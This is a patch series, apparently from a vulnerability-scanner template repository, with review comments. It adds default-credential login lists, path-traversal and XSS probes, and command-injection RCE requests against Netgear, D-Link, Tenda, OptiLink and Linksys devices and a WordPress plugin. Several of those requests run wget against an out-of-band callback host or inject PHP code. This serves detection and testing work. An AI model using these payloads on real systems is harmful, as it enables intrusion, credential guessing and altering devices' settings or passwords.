From 34b611d9614b91c6cb405cfd39465bee8e721fa2 Mon Sep 17 00:00:00 2001 From: Robert Wiggins <51722811+RandomRobbieBF@users.noreply.github.com> Date: Wed, 23 Jun 2021 09:04:06 +0100 Subject: [PATCH 001/132] Create adobe-aem-default-credentials.yaml --- .../aem/adobe-aem-default-credentials.yaml | 65 +++++++++++++++++++ 1 file changed, 65 insertions(+) create mode 100644 default-logins/aem/adobe-aem-default-credentials.yaml diff --git a/default-logins/aem/adobe-aem-default-credentials.yaml b/default-logins/aem/adobe-aem-default-credentials.yaml new file mode 100644 index 0000000000..6dbc3a84d3 --- /dev/null +++ b/default-logins/aem/adobe-aem-default-credentials.yaml 
@@ -0,0 +1,65 @@ +id: adobe-aem-default-credentials + +info: + name: Adobe AEM Default Credentials + author: random-robbie + severity: critical + tags: aem,default-login + reference: + +requests: + + - payloads: + + rr_username: + - admin + - grios + - replication-receiver + - vgnadmin + - aparker@geometrixx.info + - jdoe@geometrixx.info + - james.devore@spambob.com + - matt.monroe@mailinator.com + - aaron.mcdonald@mailinator.com + - jason.werner@dodgit.com + + rr_password: + - admin + - password + - replication-receiver + - vgnadmin + - aparker + - jdoe + - password + - password + - password + - password + + attack: clusterbomb # Available options: sniper, pitchfork and clusterbomb + + raw: + - | + POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0 + Accept: text/plain, */*; q=0.01 + Accept-Language: en-US,en;q=0.5 + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + X-Requested-With: XMLHttpRequest + Content-Length: 67 + Origin: {{BaseURL}} + Referer: {{BaseURL}}/libs/granite/core/content/login.html + Connection: close + + _charset_=utf-8&j_username={{rr_username}}&j_password={{rr_password}}&j_validate=true + + matchers-condition: and + matchers: + - type: status + status: + - 302 + + - type: word + part: header + words: + - crx From 18796b5bba2b607603449bf868f39d91db79063e Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 24 Jun 2021 00:40:11 +0530 Subject: [PATCH 003/132] Update adobe-aem-default-credentials.yaml --- default-logins/aem/adobe-aem-default-credentials.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/default-logins/aem/adobe-aem-default-credentials.yaml b/default-logins/aem/adobe-aem-default-credentials.yaml index 6dbc3a84d3..2ec85a21ac 100644 --- a/default-logins/aem/adobe-aem-default-credentials.yaml 
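Review bot: The `reference:` key in the info block is left empty, which YAML reads as null rather than a URL; either remove the key or point it at the vendor page that lists these default AEM accounts. The success signal is a 302 plus the string `crx` anywhere in the response headers, and a redirect that merely carries `crx` in a Location or cookie value is not proof that the credential pair worked; verify against a deliberately wrong password that the failure path does not also return 302 with that header, and prefer a success-specific signal such as the session cookie set on a successful `j_security_check` if one is available. The raw request also hard-codes `Content-Length: 67` while the body length varies with each credential pair; unless nuclei recomputes it for non-`unsafe` raw requests, the longer pairs will be truncated, so it is safest to drop that header line.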
+++ b/default-logins/aem/adobe-aem-default-credentials.yaml @@ -5,12 +5,12 @@ info: author: random-robbie severity: critical tags: aem,default-login - reference: + reference: requests: - payloads: - + rr_username: - admin - grios @@ -36,7 +36,7 @@ requests: - password attack: clusterbomb # Available options: sniper, pitchfork and clusterbomb - + raw: - | POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1 @@ -52,7 +52,7 @@ requests: Connection: close _charset_=utf-8&j_username={{rr_username}}&j_password={{rr_password}}&j_validate=true - + matchers-condition: and matchers: - type: status From 33a879e9d575d2ae0414599d58b3d737dedb0ffe Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Fri, 25 Jun 2021 00:12:06 +0530 Subject: [PATCH 004/132] updated attack type --- default-logins/aem/adobe-aem-default-credentials.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/default-logins/aem/adobe-aem-default-credentials.yaml b/default-logins/aem/adobe-aem-default-credentials.yaml index 2ec85a21ac..b6aacc7e67 100644 --- a/default-logins/aem/adobe-aem-default-credentials.yaml +++ b/default-logins/aem/adobe-aem-default-credentials.yaml @@ -35,7 +35,7 @@ requests: - password - password - attack: clusterbomb # Available options: sniper, pitchfork and clusterbomb + attack: pitchfork # Available options: sniper, pitchfork and clusterbomb raw: - | From 9d8f8f8589491b7fea7cdcd5f4dd51437d6341cc Mon Sep 17 00:00:00 2001 From: Robbie Date: Wed, 30 Jun 2021 11:50:41 +0100 Subject: [PATCH 005/132] Create CVE-2013-3827.yaml --- cves/2013/CVE-2013-3827.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2013/CVE-2013-3827.yaml diff --git a/cves/2013/CVE-2013-3827.yaml b/cves/2013/CVE-2013-3827.yaml new file mode 100644 index 0000000000..d8465e8d2c --- /dev/null +++ b/cves/2013/CVE-2013-3827.yaml 
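Review bot: Switching to `pitchfork` makes the template depend on `rr_username` and `rr_password` having the same length and the same order, and nothing in the file says so; a later edit that adds one account without its password would silently mis-pair or drop credentials. Add a comment above the payload block, e.g. `# pitchfork: rr_username[i] is sent with rr_password[i]; keep both lists the same length and order`. The payload lists themselves are outside this hunk.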
@@ -0,0 +1,27 @@ +id: CVE-2013-3827 + +info: + name: CVE-2013-3827 + author: Random-Robbie + severity: medium + description: Javafaces LFI + +requests: + - method: GET + path: + - "{{BaseURL}}/costModule/faces/javax.faces.resource/web.xml?loc=../WEB-INF" + - "{{BaseURL}}/costModule/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.." + - "{{BaseURL}}/faces/javax.faces.resource/web.xml?loc=../WEB-INF" + - "{{BaseURL}}/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.." + - "{{BaseURL}}/secureader/javax.faces.resource/web.xml?loc=../WEB-INF" + - "{{BaseURL}}/secureader/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.." + - "{{BaseURL}}/myaccount/javax.faces.resource/web.xml?loc=../WEB-INF" + - "{{BaseURL}}/myaccount/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.." + - "{{BaseURL}}/SupportPortlet/faces/javax.faces.resource/web.xml?loc=../WEB-INF" + - "{{BaseURL}}/SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.." + matchers-condition: and + matchers: + - type: word + words: + - "web-app version" + part: body From 3802723219b997cecd1d3e4011eef255f3f8fddf Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 30 Jun 2021 23:39:47 +0530 Subject: [PATCH 006/132] Update CVE-2013-3827.yaml --- cves/2013/CVE-2013-3827.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2013/CVE-2013-3827.yaml b/cves/2013/CVE-2013-3827.yaml index d8465e8d2c..af44677113 100644 --- a/cves/2013/CVE-2013-3827.yaml +++ b/cves/2013/CVE-2013-3827.yaml @@ -5,6 +5,7 @@ info: author: Random-Robbie severity: medium description: Javafaces LFI + tags: cve,cve2013,lfi requests: - method: GET From 3c2971b09a8e64c57fe106aedd1918bd43a7d04e Mon Sep 17 00:00:00 2001 From: Ivanov Vladimir Date: Tue, 6 Jul 2021 13:39:45 +0300 Subject: [PATCH 007/132] Add sap-igs-detect.yaml --- technologies/sap-igs-detect.yaml | 40 ++++++++++++++++++++++++++++++++ 1 file changed, 40 insertions(+) create mode 100644 technologies/sap-igs-detect.yaml 
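Review bot: The only matcher is the loose body word `web-app version` with no status check, and `matchers-condition: and` is applied to a single matcher; add `- type: status` / `status: - 200` and match a second token that only a served descriptor contains, such as `</web-app>`, so a page that merely mentions the phrase does not fire. The info block is also thin for a CVE template: `description: Javafaces LFI` says nothing about the JavaServer Faces resource-handler traversal being probed, and there is no `reference:`; at minimum `reference: https://nvd.nist.gov/vuln/detail/CVE-2013-3827` belongs there. All ten paths are sent to every target, so state in the description that they are application-specific context roots rather than generic ones.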
diff --git a/technologies/sap-igs-detect.yaml b/technologies/sap-igs-detect.yaml new file mode 100644 index 0000000000..e4a882b009 --- /dev/null +++ b/technologies/sap-igs-detect.yaml @@ -0,0 +1,40 @@ +id: sap-igs-detect + +info: + name: SAP Internet Graphics Server (IGS) Detection + author: _generic_human_ + description: Detection of SAP Internet Graphics Server (IGS) + severity: info + tags: sap,webserver,igs + +requests: + - method: GET + path: + - "{{BaseURL}}" + + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + part: body + words: + - "SAP IGS" + - "is running" + condition: and + + - type: status + status: + - 200 + + - type: word + part: header + words: + - "SAP Internet Graphics Server" + condition: and + + extractors: + - type: kval + part: header + kval: + - "Server" From 4326841cb4321e7fe1cf6d3b821818dcc6fbeb2e Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 8 Jul 2021 14:43:40 +0530 Subject: [PATCH 008/132] Update sap-igs-detect.yaml --- technologies/sap-igs-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/technologies/sap-igs-detect.yaml b/technologies/sap-igs-detect.yaml index e4a882b009..bab13679aa 100644 --- a/technologies/sap-igs-detect.yaml +++ b/technologies/sap-igs-detect.yaml @@ -5,7 +5,7 @@ info: author: _generic_human_ description: Detection of SAP Internet Graphics Server (IGS) severity: info - tags: sap,webserver,igs + tags: sap,tech,igs requests: - method: GET From adc16e4bdfb637e018cac986b4dec4caa5e927f5 Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Sun, 11 Jul 2021 13:26:49 +0900 Subject: [PATCH 009/132] Create ricoh-weak-password.yaml Signed-off-by: GwanYeong Kim --- default-logins/ricoh/ricoh-weak-password.yaml | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 default-logins/ricoh/ricoh-weak-password.yaml 
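Review bot: The header matcher's `condition: and` is a no-op with a single word and should be dropped; more importantly, with `matchers-condition: and` detection requires the body banner, a 200 and the `SAP Internet Graphics Server` header all at once, so a deployment behind a proxy that rewrites or strips `Server` will not be reported even though the body banner is unambiguous. If that phrase is only ever found in the `Server` header (the hunk does not show it), consider dropping the header matcher, since the kval extractor already captures `Server`, or group body and header as an `or` with the status check kept as `and`.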
diff --git a/default-logins/ricoh/ricoh-weak-password.yaml b/default-logins/ricoh/ricoh-weak-password.yaml new file mode 100644 index 0000000000..a7db0ce8a6 --- /dev/null +++ b/default-logins/ricoh/ricoh-weak-password.yaml @@ -0,0 +1,28 @@ +id: ricoh-weak-password + +info: + name: Ricoh Weak Password + author: gy741 + severity: high + tags: ricoh,default-login + reference: https://ricoh-printer.co/default-username-and-password-for-ricoh-web-image-monitor/ + +requests: + - raw: + - | + POST /web/guest/tw/websys/webArch/login.cgi HTTP/1.1 + Host: {{Hostname}} + Cookie: cookieOnOffChecker=on; + + wimToken=&userid_work=&userid=YWRtaW4%3D&password_work=&password=&open= + + matchers-condition: and + matchers: + - type: regex + regex: + - 'wimsesid=[0-9]+' + part: header + + - type: status + status: + - 302 From b3766162cc0e17343bc48d1a542167e93a8000d8 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Thu, 15 Jul 2021 06:19:57 +0700 Subject: [PATCH 010/132] Create CVE-2012-1835.yaml --- cves/2012/CVE-2012-1835.yaml | 33 +++++++++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 cves/2012/CVE-2012-1835.yaml diff --git a/cves/2012/CVE-2012-1835.yaml b/cves/2012/CVE-2012-1835.yaml new file mode 100644 index 0000000000..284837442b --- /dev/null +++ b/cves/2012/CVE-2012-1835.yaml 
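Review bot: The request logs in as `userid=YWRtaW4%3D` (base64 of `admin`) with an empty `password`, but nothing in the template says so and the name only says "weak password"; add `# userid is base64("admin"); password is deliberately empty (factory default)` above the body and state the same in a `description:`. The success signal is a 302 plus any `wimsesid=<digits>` in the headers, and if the device issues that session id to unauthenticated visitors too (not established here) every reachable Ricoh will match, so verify against a deliberately wrong password before trusting `severity: high`. The POST also carries no `Content-Type: application/x-www-form-urlencoded` header, and the `/tw/` locale segment in the path may not exist on every firmware.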
@@ -0,0 +1,33 @@ +id: CVE-2012-1835 + +info: + name: WordPress Plugin All-in-One Event Calendar 1.4 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2012-1835 + tags: cve,cve2012,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php?title[id]=%22%3E%3Cscript%3Ealert%28123%29;%3C/script%3E' + - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?args[before_widget]=%3Cscript%3Ealert%28123%29;%3C/script%3E' + - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3Cscript%3Ealert%28123%29;%3C/script%3E' + - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&before_title=%3Cscript%3Ealert%28123%29;%3C/script%3E' + - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&after_title=%3Cscript%3Ealert%28123%29;%3C/script%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 67ae44be04b4af872489bc9ee6602e7726a3186b Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Thu, 15 Jul 2021 10:54:56 +0900 Subject: [PATCH 011/132] Create CVE-2020-26919.yaml it was found that every section of the web could be used as a valid endpoint to submit POST requests being the action defined by the submitId argument. The problem was located in the login.html webpage, that has to be publicly available to perform login requests but does not implement any restriction for executing debug actions. This will allow users execute system commands. Signed-off-by: GwanYeong Kim --- cves/2020/CVE-2020-26919.yaml | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 cves/2020/CVE-2020-26919.yaml 
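Review bot: As rendered here the body matcher's word is the empty string `""`, which matches every 200 text/html response and reduces the template to a file-exists check; if that is the angle brackets of the reflected payload being stripped in rendering, make sure the committed value is the exact reflected string, quoted, e.g. `- "<script>alert(123);</script>"`. The template also ships without a `description:`, so a one-line summary of which parameters of `agenda-widget.php` and `agenda-widget-form.php` reflect would help a triager. All five paths are fired on every target and nothing records whether each one was verified.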
diff --git a/cves/2020/CVE-2020-26919.yaml b/cves/2020/CVE-2020-26919.yaml new file mode 100644 index 0000000000..fffb1e22e4 --- /dev/null +++ b/cves/2020/CVE-2020-26919.yaml @@ -0,0 +1,28 @@ +id: CVE-2020-26919 + +info: + name: Netgear ProSAFE Plus - Unauthenticated Remote Code Execution + author: gy741 + severity: critical + description: It was found that every section of the web could be used as a valid endpoint to submit POST requests being the action defined by the submitId argument. The problem was located in the login.html webpage, that has to be publicly available to perform login requests but does not implement any restriction for executing debug actions. This will allow users execute system commands. + reference: | + - https://research.nccgroup.com/2021/03/08/technical-advisory-multiple-vulnerabilities-in-netgear-prosafe-plus-jgs516pe-gs116ev2-switches/ + - https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/ + tags: cve,cve2020,netgear,rce + +requests: + - raw: + - | + POST /login.htm HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 + Accept: */* + Connection: close + + submitId=debug&debugCmd=wget+http://{{interactsh-url}}&submitEnd= + + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" From 1af27d9260266eb7e5f27382a832ede96cbae7ef Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Thu, 15 Jul 2021 09:41:14 +0700 Subject: [PATCH 012/132] Create CVE-2016-10960.yaml --- CVE-2016-10960.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 CVE-2016-10960.yaml diff --git a/CVE-2016-10960.yaml b/CVE-2016-10960.yaml new file mode 100644 index 0000000000..3110e9b2eb --- /dev/null +++ b/CVE-2016-10960.yaml 
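Review bot: The POST body `submitId=debug&debugCmd=wget+http://{{interactsh-url}}&submitEnd=` is sent without a `Content-Type: application/x-www-form-urlencoded` header, and as far as I can tell nuclei does not add one to raw requests; if the switch's CGI only parses form bodies that carry it, the injection never runs and the template silently reports nothing, so add the header under `Accept: */*`. It is also worth a comment above the body that this probe executes `wget` on the device rather than fingerprinting it, e.g. `# runs wget on the switch; only the interactsh callback confirms RCE`.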
@@ -0,0 +1,25 @@ +id: CVE-2016-10960 + +info: + name: wSecure Lite < 2.4 - Remote Code Execution (RCE) + author: daffainfo + severity: critical + description: The wsecure plugin before 2.4 for WordPress has remote code execution via shell metacharacters in the wsecure-config.php publish parameter. + reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10960 + tags: cve,cve2016,wordpress,wp-plugin,rce + +requests: + - method: POST + path: + - "{{BaseURL}}/wp-content/plugins/wsecure/wsecure-config.php" + body: 'wsecure_action=update&publish=";} echo "Hello, world."; class WSecureConfig2 {var $test="' + + matchers-condition: and + matchers: + - type: word + words: + - "Hello, world." + condition: and + - type: status + status: + - 200 From a3699d912a2df739e796877ce6109c3b905b5281 Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Thu, 15 Jul 2021 14:28:14 +0900 Subject: [PATCH 013/132] Create CVE-2020-25506.yaml The exploit targets a command injection vulnerability in a system_mgr.cgi component. The component does not successfully sanitize the value of the HTTP parameters f_ntp_server, which in turn leads to arbitrary command execution. Signed-off-by: GwanYeong Kim --- cves/2020/CVE-2020-25506.yaml | 36 +++++++++++++++++++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 cves/2020/CVE-2020-25506.yaml diff --git a/cves/2020/CVE-2020-25506.yaml b/cves/2020/CVE-2020-25506.yaml new file mode 100644 index 0000000000..21a5709c95 --- /dev/null +++ b/cves/2020/CVE-2020-25506.yaml 
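Review bot: The payload posts `wsecure_action=update` with PHP code in `publish`, and per the description that parameter ends up in `wsecure-config.php`, so a successful run likely persists `echo "Hello, world."` and a `WSecureConfig2` class into the target's plugin configuration rather than merely reflecting it, which can break the plugin and leaves injected code behind. That side effect should be stated in `description:` or in a comment above `body:` so operators know the scan modifies the site. The request has no `headers:` block; if the plugin reads `$_POST`, add `Content-Type: application/x-www-form-urlencoded`. The `condition: and` on a single-word matcher is a no-op.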
@@ -0,0 +1,36 @@ +id: CVE-2020-25506 + +info: + name: D-Link DNS-320 - Unauthenticated Remote Code Execution + author: gy741 + severity: critical + description: The exploit targets a command injection vulnerability in a system_mgr.cgi component. The component does not successfully sanitize the value of the HTTP parameters f_ntp_server, which in turn leads to arbitrary command execution. + reference: | + - https://gist.github.com/WinMin/6f63fd1ae95977e0e2d49bd4b5f00675 + - https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/ + tags: cve,cve2020,dlink,rce + +requests: + - raw: + - | + POST /cgi-bin/system_mgr.cgi? HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 + Accept: */* + Connection: close + + C1=ON&cmd=cgi_ntp_time&f_ntp_server=`wget http://{{interactsh-url}}` + + - | + POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`wget http://{{interactsh-url}}` HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 + Accept: */* + Connection: close + + unsafe: true + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" From 1eb999ce02d5cc8fd72cd9647d141f1dc7ac866c Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Thu, 15 Jul 2021 14:57:34 +0900 Subject: [PATCH 014/132] Create optiLink-ont1gew-gpon-rce.yaml vulnerabilities in the web-based management interface of OptiLink could allow an authenticated, remote attacker to perform command injection attacks against an affected device. Signed-off-by: GwanYeong Kim --- .../other/optiLink-ont1gew-gpon-rce.yaml | 35 +++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 vulnerabilities/other/optiLink-ont1gew-gpon-rce.yaml diff --git a/vulnerabilities/other/optiLink-ont1gew-gpon-rce.yaml b/vulnerabilities/other/optiLink-ont1gew-gpon-rce.yaml new file mode 100644 index 0000000000..799426dc22 --- /dev/null 
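Review bot: The second raw request puts the injection in the request-target with a literal space (`f_ntp_server=`wget http://{{interactsh-url}}` HTTP/1.1`), and with `unsafe: true` nuclei sends that line verbatim, so the server parses everything after the space as the HTTP version and never sees the command; percent-encode it, e.g. `POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=%60wget%20http://{{interactsh-url}}%60 HTTP/1.1`. `unsafe: true` applies to the first request as well, whose body is sent with neither `Content-Length` nor `Content-Type`, so confirm the NAS still reads the form in that case. Both requests run on every target (no `stop-at-first-match`), each triggering a `wget` on the device.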
+++ b/vulnerabilities/other/optiLink-ont1gew-gpon-rce.yaml @@ -0,0 +1,35 @@ +id: optiLink-ont1gew-gpon-rce + +info: + name: OptiLink ONT1GEW GPON - Pre-Auth Remote Code Execution + author: gy741 + severity: critical + description: vulnerabilities in the web-based management interface of OptiLink could allow an authenticated, remote attacker to perform command injection attacks against an affected device. + reference: | + - https://packetstormsecurity.com/files/162993/OptiLink-ONT1GEW-GPON-2.1.11_X101-Remote-Code-Execution.html + - https://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai + tags: optiLink,rce,oob + +requests: + - raw: + - | + POST /boaform/admin/formTracert HTTP/1.1 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 + Accept-Language: en-US,en;q=0.5 + Content-Type: application/x-www-form-urlencoded + Origin: http://{{Hostname}} + Connection: keep-alive + Referer: http://{{Hostname}}/diag_ping_admin_en.asp + Upgrade-Insecure-Requests: 1 + Host: {{Hostname}} + User: e8c + Password: e8c + User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 + + target_addr="1.1.1.1+`wget+http%3A%2F%2F{{interactsh-url}}%2F`"&waninf=127.0.0.1" + + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" From 1c729ab1ea5c4f2480a2d3088e22611613cd1e74 Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Thu, 15 Jul 2021 15:09:26 +0900 Subject: [PATCH 015/132] Create CVE-2021-31755.yaml Vulnerabilities in the web-based management interface of enda Router AC11 could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. Signed-off-by: GwanYeong Kim --- cves/2021/CVE-2021-31755.yaml | 32 ++++++++++++++++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 cves/2021/CVE-2021-31755.yaml 
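Review bot: The `name` calls this "Pre-Auth Remote Code Execution" while `description` says it requires an "authenticated, remote attacker", and the request sends `User: e8c` / `Password: e8c` headers; one of the two is wrong, and if those headers are what authenticates the request this is post-auth with vendor default credentials, which changes how a finding is triaged. Align the description with what the reference confirms and add a comment above the headers, e.g. `# e8c/e8c sent as vendor default credentials; remove if formTracert is reachable unauthenticated`. The body also ends with a stray `"` after `waninf=127.0.0.1`, and `Origin`/`Referer` hard-code `http://{{Hostname}}`, which is wrong on HTTPS-only targets where `{{BaseURL}}` would be correct.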
diff --git a/cves/2021/CVE-2021-31755.yaml b/cves/2021/CVE-2021-31755.yaml new file mode 100644 index 0000000000..d1d4550b3f --- /dev/null +++ b/cves/2021/CVE-2021-31755.yaml @@ -0,0 +1,32 @@ +id: CVE-2021-31755 + +info: + name: Tenda Router AC11 RCE + description: Vulnerabilities in the web-based management interface of enda Router AC11 could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. + author: gy741 + severity: critical + reference: | + - https://github.com/Yu3H0/IoT_CVE/tree/main/Tenda/CVE_3 + - https://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai + tags: cve,cve2021,tenda,rce,oob + +requests: + - raw: + - | + POST /goform/setmac HTTP/1.1 + Host: {{Hostname}} + Connection: close + Accept-Encoding: gzip, deflate + Accept: */* + Origin: http://{{Hostname}} + Referer: http://{{Hostname}}/index.htmlr + User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 + Content-Type: application/x-www-form-urlencoded + + module1=wifiBasicCfg&doubleBandUnityEnable=false&wifiTotalEn=true&wifiEn=true&wifiSSID=Tenda_B0E040&mac=wget+http://{{interactsh-url}}&wifiSecurityMode=WPAWPA2%2FAES&wifiPwd=Password12345&wifiHideSSID=false&wifiEn_5G=true&wifiSSID_5G=Tenda_B0E040_5G&wifiSecurityMode_5G=WPAWPA2%2FAES&wifiPwd_5G=Password12345&wifiHideSSID_5G=false&module2=wifiGuest&guestEn=false&guestEn_5G=false&guestSSID=Tenda_VIP&guestSSID_5G=Tenda_VIP_5G&guestPwd=&guestPwd_5G=&guestValidTime=8&guestShareSpeed=0&module3=wifiPower&wifiPower=high&wifiPower_5G=high&module5=wifiAdvCfg&wifiMode=bgn&wifiChannel=auto&wifiBandwidth=auto&wifiMode_5G=ac&wifiChannel_5G=auto&wifiBandwidth_5G=auto&wifiAntijamEn=false&module6=wifiBeamforming&wifiBeaformingEn=true&module7=wifiWPS&wpsEn=true&wanType=static + + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" From fb1f67ce26b0176e87ccc0ceb861d178c31ab398 Mon Sep 17 00:00:00 2001 
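Review bot: The body to `/goform/setmac` is not just an injection vector: alongside `mac=wget+http://{{interactsh-url}}` it submits a full wireless configuration (`wifiSSID=Tenda_B0E040`, `wifiPwd=Password12345`, `wifiSecurityMode=WPAWPA2/AES`, `wpsEn=true`, guest-network fields, `wanType=static`), so if the handler applies those fields a positive result also rewrites the target's SSID, Wi-Fi password, WPS and WAN mode. That must be stated in `description:` and in a comment above the body, e.g. `# WARNING: setmac saves every field in this body; a vulnerable router may have its SSID/password/WAN mode changed`, and the form should be cut down to the minimum the injection needs once that is verified against the reference. Minor: the description reads "enda Router AC11" (Tenda) and `Referer` points at `/index.htmlr`.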
From: Prince Chaddha Date: Thu, 15 Jul 2021 14:21:17 +0530 Subject: [PATCH 016/132] Rename CVE-2016-10960.yaml to cves/2016/CVE-2016-10960.yaml --- CVE-2016-10960.yaml => cves/2016/CVE-2016-10960.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename CVE-2016-10960.yaml => cves/2016/CVE-2016-10960.yaml (100%) diff --git a/CVE-2016-10960.yaml b/cves/2016/CVE-2016-10960.yaml similarity index 100% rename from CVE-2016-10960.yaml rename to cves/2016/CVE-2016-10960.yaml From f8f9f539eaff7a24b30af2aa2404e0b1f76230ec Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Thu, 15 Jul 2021 18:10:11 +0900 Subject: [PATCH 017/132] Create CVE-2020-35713.yaml Belkin LINKSYS RE6500 devices before 1.0.012.001 allow remote attackers to execute arbitrary commands or set a new password via shell metacharacters to the goform/setSysAdm page. Signed-off-by: GwanYeong Kim --- cves/2020/CVE-2020-35713.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2020/CVE-2020-35713.yaml diff --git a/cves/2020/CVE-2020-35713.yaml b/cves/2020/CVE-2020-35713.yaml new file mode 100644 index 0000000000..7e3e77e0b3 --- /dev/null +++ b/cves/2020/CVE-2020-35713.yaml 
@@ -0,0 +1,29 @@ +id: CVE-2020-35713 + +info: + name: Linksys RE6500 Pre-Auth RCE + author: gy741 + severity: critical + reference: https://resolverblog.blogspot.com/2020/07/linksys-re6500-unauthenticated-rce-full.html + description: Belkin LINKSYS RE6500 devices before 1.0.012.001 allow remote attackers to execute arbitrary commands or set a new password via shell metacharacters to the goform/setSysAdm page. + tags: cve,cve2020,linksys,rce,oob + +requests: + - raw: + - | + POST /goform/setSysAdm HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 + Accept-Encoding: gzip, deflate + Accept: */* + Connection: keep-alive + Origin: http://{{Hostname}} + Referer: http://{{Hostname}}/login.shtml + + admuser=admin&admpass=;wget http://{{interactsh-url}};&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1 + + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" From a13090dd4bf6706f241bfc33fb7e839162d653c9 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 15 Jul 2021 15:01:21 +0530 Subject: [PATCH 018/132] Update CVE-2012-1835.yaml --- cves/2012/CVE-2012-1835.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2012/CVE-2012-1835.yaml b/cves/2012/CVE-2012-1835.yaml index 284837442b..8bb63f3f98 100644 --- a/cves/2012/CVE-2012-1835.yaml +++ b/cves/2012/CVE-2012-1835.yaml 
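Review bot: The probe posts `admuser=admin&admpass=;wget http://{{interactsh-url}};` to `/goform/setSysAdm`, the endpoint the description itself says sets a new password, so a vulnerable extender may end up with its admin password replaced by that command string, with `AuthTimeout=600` and `wirelessMgmt_http=1` applied on top. That is a state-changing, potentially lock-out action and should be flagged in `description:` and above the body, e.g. `# setSysAdm saves these fields: a successful run can change the admin password to the injected string`. Confirm against the reference whether a body containing only the injected parameter still triggers the bug, and add `Content-Type: application/x-www-form-urlencoded` since none is sent.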
